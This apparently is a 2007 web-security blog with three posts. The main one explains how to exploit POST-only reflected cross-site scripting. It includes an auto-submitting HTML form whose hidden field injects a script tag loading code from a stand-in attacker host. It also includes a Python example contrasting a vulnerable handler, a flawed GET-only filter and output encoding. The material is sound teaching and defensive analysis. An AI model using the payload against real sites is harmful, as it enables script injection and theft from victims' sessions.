Thursday, March 29, 2007

Exploiting XSS in POST requests

One good question I was asked in Amsterdam was whether it is possible to exploit a reflected cross-site scripting bug that can only be triggered via a POST request. The answer, of course, is "yes".

There are plenty of delivery mechanisms for reflected XSS attacks, only some of which involve inducing a victim to click on a crafted URL. For example, an attacker can create an innocuous looking web page containing an HTML form with the required fields, and a script which auto-submits the form:

<form name=TheForm action=http://vuln-app/page.jsp method=post>
<input type=hidden name=foo value='"><script src=http://attacker/bad.js></script>'>
</form>
<script>document.TheForm.submit();</script>

Rather than creating his own web site, the attacker could of course inject the above attack into a third-party application via a stored XSS bug. The form is submitted cross-domain (as in a cross-site request forgery attack), but the resulting payload executes within the security context of the vulnerable application, enabling the full range of standard XSS attack actions to be performed.
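The defensive corollary of the above is that the HTTP method tells you nothing about whether a reflected parameter is attacker-controlled, so the fix has to be output encoding rather than screening query strings. The following is an added example, not code from the original post: a hypothetical Python stand-in for the vulnerable page.jsp handler, shown with a half-fix that only inspects GET parameters and with a properly encoded version. The POST body is constructed to match what a browser would send for the auto-submitted form, and the rendered output is parsed to count which tags the browser would actually see.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed sample body, application/x-www-form-urlencoded, as the browser
# would send it for the auto-submitted form above (hypothetical values).
SAMPLE_POST_BODY = (
    'foo=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fattacker%2Fbad.js%3E%3C%2Fscript%3E'
)

# The page reflects the parameter into an attribute value.
TEMPLATE = '<input type="text" name="foo" value="{value}">'


def parse_form_body(body):
    """Decode a urlencoded form body into a {name: value} dict (first value wins)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(method, params):
    """Hypothetical page.jsp: reflects foo into the attribute with no encoding."""
    return TEMPLATE.format(value=params.get('foo', ''))


def render_get_only_filter(method, params):
    """A mistaken fix: screen only GET parameters, on the assumption that the
    victim must be lured into clicking a crafted URL.  POST bodies pass through."""
    foo = params.get('foo', '')
    if method == 'GET' and ('<' in foo or '"' in foo):
        foo = ''
    return TEMPLATE.format(value=foo)


def render_hardened(method, params):
    """Encode on output, whatever route the parameter arrived by.
    quote=True also encodes the double quote that closes the attribute."""
    return TEMPLATE.format(value=escape(params.get('foo', ''), quote=True))


class _TagCollector(HTMLParser):
    """Records every start tag in the order the browser would encounter it."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(fragment):
    """Return the list of start tags in a rendered HTML fragment."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


if __name__ == '__main__':
    params = parse_form_body(SAMPLE_POST_BODY)
    for name, handler in (('vulnerable', render_vulnerable),
                          ('GET-only filter', render_get_only_filter),
                          ('hardened', render_hardened)):
        for method in ('GET', 'POST'):
            print(f'{name:16} {method:4} -> {tags_in(handler(method, params))}')
```

Run stand-alone it prints a table of tag lists; the only combination that yields a single input tag for both methods is the encoded output, while the GET-only filter still lets a script tag through when the same value arrives in a POST body.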

Monday, March 19, 2007

Black Hat Europe

I'm going to be co-presenting a training course in Amsterdam next week. Though I say it myself, the course should be pretty fun. As well as all the usual web app stuff, we're going to cover some more entertaining hacks like reversing Java applets and Flash. If you want to know how to cheat at online poker whilst you're supposed to be doing a pen test, this course is perfect for you. Anyone who happens to be there, please do come and say hello.

Saturday, March 10, 2007

Hello world

I realise that this may be somewhat late in the day to be starting a blog about web application security, especially given that you would expect all of that stuff to have been sorted out by now. But two pertinent facts are that (a) I am prone to prolonged periods of inactivity; and (b) I will shortly have a new book to promote. There is certainly still much to say that is interesting and even fun, so please expect future posts to be rather more noteworthy than this one. In the meantime, hello web app world.